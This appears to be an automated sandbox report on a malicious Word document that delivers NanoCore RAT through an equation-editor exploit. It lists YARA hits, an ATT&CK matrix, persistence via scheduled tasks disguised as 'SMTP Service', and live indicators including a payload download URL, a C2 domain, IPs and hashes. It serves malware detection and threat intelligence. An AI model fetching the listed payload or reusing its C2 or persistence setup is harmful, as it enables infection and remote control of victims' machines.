        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Users\user\AppData\Roaming\catzjt7863.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: catzjt7863.exe, 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000007.00000002.705701351.0000000002631000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D29EA bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D2998 bind,

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter3Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery14Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsScheduled Task/Job1Logon Script (Windows)Process Injection312Obfuscated Files or Information3Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Scheduled Task/Job1Software Packing13NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol222Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion31DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 509411 Sample: Purchase order_122.doc Startdate: 26/10/2021 Architecture: WINDOWS Score: 100 51 drrkingsleym001.ddns.net 2->51 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Found malware configuration 2->61 63 17 other signatures 2->63 9 EQNEDT32.EXE 11 2->9         started        14 taskeng.exe 1 2->14         started        16 smtpsvc.exe 2 2->16         started        18 WINWORD.EXE 291 20 2->18         started        signatures3 process4 dnsIp5 53 binatonezx.tk 2.56.59.211, 49165, 80 GBTCLOUDUS Netherlands 9->53 43 C:\Users\user\AppData\...\catzjt7863.exe, PE32 9->43 dropped 45 C:\Users\user\AppData\Local\...\catzx[1].exe, PE32 9->45 dropped 73 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->73 20 catzjt7863.exe 1 10 9->20         started        24 RegSvcs.exe 2 14->24         started        26 smtpsvc.exe 2 14->26         started        file6 signatures7 process8 file9 39 C:\Users\user\AppData\Roaming\eWoGxZG.exe, PE32 20->39 dropped 41 C:\Users\user\AppData\Local\...\tmp566B.tmp, XML 20->41 dropped 65 Machine Learning detection for dropped file 20->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 20->67 69 Writes to foreign memory regions 20->69 71 2 other signatures 20->71 28 RegSvcs.exe 1 12 20->28         started        33 schtasks.exe 20->33         started        signatures10 process11 dnsIp12 55 drrkingsleym001.ddns.net 103.133.109.121, 1665, 49166, 49167 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 28->55 47 C:\Users\user\AppData\Roaming\...\run.dat, data 28->47 dropped 49 C:\Program Files (x86)\...\smtpsvc.exe, PE32 28->49 dropped 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->75 35 schtasks.exe 28->35         started        37 schtasks.exe 28->37         started        file13 signatures14 process15

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\catzjt7863.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\eWoGxZG.exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        7.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        7.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        7.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        7.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        7.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
        7.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        7.2.RegSvcs.exe.560000.3.unpack100%AviraTR/NanoCore.fadteDownload File

        Domains

        SourceDetectionScannerLabelLink
        binatonezx.tk15%VirustotalBrowse
        drrkingsleym001.ddns.net8%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.%s.comPA0%URL Reputationsafe
        drrkingsleym001.ddns.net8%VirustotalBrowse
        drrkingsleym001.ddns.net0%Avira URL Cloudsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe
        http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
        http://binatonezx.tk/catzx.exe100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        binatonezx.tk
        2.56.59.211
        truetrueunknown
        drrkingsleym001.ddns.net
        103.133.109.121
        truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        drrkingsleym001.ddns.nettrue
        • 8%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://binatonezx.tk/catzx.exetrue
        • Avira URL Cloud: malware
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.%s.comPAcatzjt7863.exe, 00000004.00000002.457062751.00000000055D0000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmpfalse
        • URL Reputation: safe
        low
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmpfalse
          high
          http://servername/isapibackend.dllschtasks.exe, 00000005.00000002.449453962.0000000000870000.00000002.00020000.sdmp, schtasks.exe, 00000008.00000002.460736263.0000000001CF0000.00000002.00020000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://www.collada.org/2005/11/COLLADASchema9Donecatzjt7863.exe, 00000004.00000002.454334309.0000000000950000.00000004.00020000.sdmpfalse
          • URL Reputation: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          103.133.109.121
          drrkingsleym001.ddns.netViet Nam
          135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
          2.56.59.211
          binatonezx.tkNetherlands
          395800GBTCLOUDUStrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:509411
          Start date:26.10.2021
          Start time:14:31:24
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 12m 10s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:Purchase order_122.doc
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winDOC@18/17@22/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 5.5% (good quality ratio 5.1%)
          • Quality average: 87.1%
          • Quality standard deviation: 28.7%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .doc
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtEnumerateValueKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          14:31:31API Interceptor35x Sleep call for process: EQNEDT32.EXE modified
          14:31:35API Interceptor37x Sleep call for process: catzjt7863.exe modified
          14:31:38API Interceptor4x Sleep call for process: schtasks.exe modified
          14:31:43API Interceptor1389x Sleep call for process: RegSvcs.exe modified
          14:31:45Task SchedulerRun new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" s>$(Arg0)
          14:31:46API Interceptor273x Sleep call for process: taskeng.exe modified
          14:31:46AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
          14:31:49Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          103.133.109.121b2ZeLApyX2.exeGet hashmaliciousBrowse
            Purchase order_122.docGet hashmaliciousBrowse
              YKr3m9a7C3.exeGet hashmaliciousBrowse
                SWIFT COPY.docGet hashmaliciousBrowse
                  2.56.59.211SMC Req Offer.docGet hashmaliciousBrowse
                  • binatonezx.tk/seasonzx.exe
                  Original Shipping documents.docGet hashmaliciousBrowse
                  • binatonezx.tk/villarzx.exe
                  payment.docGet hashmaliciousBrowse
                  • binatonezx.tk/davidhillzx.exe
                  _Payment Advise.docGet hashmaliciousBrowse
                  • binatonezx.tk/trulexzx.exe
                  FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                  • binatonezx.tk/asadzx.exe
                  QUOTE B1018530.docGet hashmaliciousBrowse
                  • binatonezx.tk/mazx.exe
                  About company.docGet hashmaliciousBrowse
                  • binatonezx.tk/gregzx.exe
                  Purchase order_122.docGet hashmaliciousBrowse
                  • binatonezx.tk/catzx.exe
                  PRICE QUOTATION.docGet hashmaliciousBrowse
                  • binatonezx.tk/seasonzx.exe
                  PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                  • binatonezx.tk/obinnazx.exe
                  Purchase Order.docGet hashmaliciousBrowse
                  • binatonezx.tk/villarzx.exe

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  binatonezx.tkSMC Req Offer.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  Original Shipping documents.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  payment.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  _Payment Advise.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  QUOTE B1018530.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  About company.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  Purchase order_122.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  PRICE QUOTATION.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                  • 2.56.59.211
                  Purchase Order.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  drrkingsleym001.ddns.netb2ZeLApyX2.exeGet hashmaliciousBrowse
                  • 103.133.109.121
                  Purchase order_122.docGet hashmaliciousBrowse
                  • 103.133.109.121
                  YKr3m9a7C3.exeGet hashmaliciousBrowse
                  • 103.133.109.121
                  SWIFT COPY.docGet hashmaliciousBrowse
                  • 103.133.109.121

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  GBTCLOUDUSSMC Req Offer.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  Original Shipping documents.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  0OeX2BsbUo.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  Fri051e1e7444.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  payment.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  _Payment Advise.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  wA5D1yZuTf.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  QUOTE B1018530.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  About company.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  Purchase order_122.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  PRICE QUOTATION.docGet hashmaliciousBrowse
                  • 2.56.59.211
                  PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                  • 2.56.59.211
                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                  • 2.56.59.42
                  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNIMS211323.xlsxGet hashmaliciousBrowse
                  • 103.149.12.116
                  purchase order # 4459.xlsGet hashmaliciousBrowse
                  • 103.141.138.110
                  6811A4CEA56365431B3799600303C945593A997E61968.exeGet hashmaliciousBrowse
                  • 103.114.104.13
                  KfvEoN0wIwGet hashmaliciousBrowse
                  • 103.68.250.127
                  INQ_42-4I090.xlsxGet hashmaliciousBrowse
                  • 103.125.190.6
                  PO doc 42782.xlsxGet hashmaliciousBrowse
                  • 103.125.190.6
                  b2ZeLApyX2.exeGet hashmaliciousBrowse
                  • 103.133.109.121
                  Purchase order_122.docGet hashmaliciousBrowse
                  • 103.133.109.121
                  DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                  • 180.214.239.85
                  payment issue need help.exeGet hashmaliciousBrowse
                  • 103.133.110.241
                  DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                  • 180.214.239.85
                  PO1-424480.xlsxGet hashmaliciousBrowse
                  • 103.125.190.6
                  arm7Get hashmaliciousBrowse
                  • 14.225.246.61
                  PI Alu Circle_Dt. 14.05.2021.xlsxGet hashmaliciousBrowse
                  • 180.214.239.85
                  YKr3m9a7C3.exeGet hashmaliciousBrowse
                  • 103.133.109.121
                  SWIFT COPY.docGet hashmaliciousBrowse
                  • 103.133.109.121
                  Airway bill# 7899865792021.xlsxGet hashmaliciousBrowse
                  • 103.125.190.6
                  presupuesto.xlsxGet hashmaliciousBrowse
                  • 103.140.251.116
                  Purchase orders with bank details.ppaGet hashmaliciousBrowse
                  • 103.141.138.110
                  ZHANGZHOU YIHANSHENG HOUSEWARES.xlsxGet hashmaliciousBrowse
                  • 180.214.239.85

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Program Files (x86)\SMTP Service\smtpsvc.exePurchase order_122.docGet hashmaliciousBrowse
                    SWIFT COPY.docGet hashmaliciousBrowse
                      Order Inquiry CEW PTE LTD.docGet hashmaliciousBrowse
                        Ref 0180066743.xlsxGet hashmaliciousBrowse
                          001Photocopy.xlsxGet hashmaliciousBrowse
                            SB883681QI.xlsxGet hashmaliciousBrowse
                              PO-No.00127.docGet hashmaliciousBrowse
                                PO-14092021.docGet hashmaliciousBrowse
                                  PO-14092021.docGet hashmaliciousBrowse
                                    FACTURA PROFORMA- PO1122002092021.docGet hashmaliciousBrowse
                                      Expo Grup - 1122002092021 Sept.docGet hashmaliciousBrowse
                                        SWIFT COPY.docGet hashmaliciousBrowse
                                          P-C3787633.docGet hashmaliciousBrowse
                                            Account Statement.docGet hashmaliciousBrowse
                                              NEW Order-05271.docGet hashmaliciousBrowse
                                                NEW ORDER.docGet hashmaliciousBrowse
                                                  Nanocore.New order 22.xlsxGet hashmaliciousBrowse
                                                    PO83783877.xlsxGet hashmaliciousBrowse
                                                      DOC.1000000567.267805032019.doc__.rtfGet hashmaliciousBrowse
                                                        DOO STILO NOVI SAD EUR 5.200,99 20210705094119.docGet hashmaliciousBrowse

                                                          Created / dropped Files

                                                          C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):3.7499114035101173
                                                          Encrypted:false
                                                          SSDEEP:384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
                                                          MD5:72A9F09010A89860456C6474E2E6D25C
                                                          SHA1:E4CB506146F60D01EA9E6132020DEF61974A88C3
                                                          SHA-256:7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
                                                          SHA-512:BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
